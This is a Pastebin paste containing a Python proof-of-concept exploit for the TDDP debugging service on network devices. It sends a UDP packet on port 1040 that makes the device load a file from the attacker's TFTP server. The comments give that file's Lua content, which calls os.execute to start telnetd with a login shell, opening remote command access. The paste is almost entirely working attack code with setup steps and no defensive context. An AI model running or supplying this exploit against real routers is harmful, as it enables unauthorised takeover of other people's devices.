a guest Mar 27th, 2019 6,050 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
- # Create /testfile in your tftp root directory with the following contents:
- #function config_test(config)
- # os.execute("telnetd -l /bin/login.sh")
- # Replace 192.168.0.1 with the IP address of the vulnerable device
- import binascii
- import socket
- port_send = 1040
- port_receive = 61000
- tddp_ver = "01"
- tddp_command = "31"
- tddp_req = "01"
- tddp_reply = "00"
- tddp_padding = "%0.16X" % 00
- tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding])
- sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
- sock_receive.bind(('', port_receive))
- # Send a request
- sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
- packet = binascii.unhexlify(tddp_packet)
- packet = packet + b"/testfile;arbitrary"
- sock_send.sendto(packet, ("192.168.0.1", port_send))
- response, addr = sock_receive.recvfrom(1024)
- r = response.encode('hex')
RAW Paste Data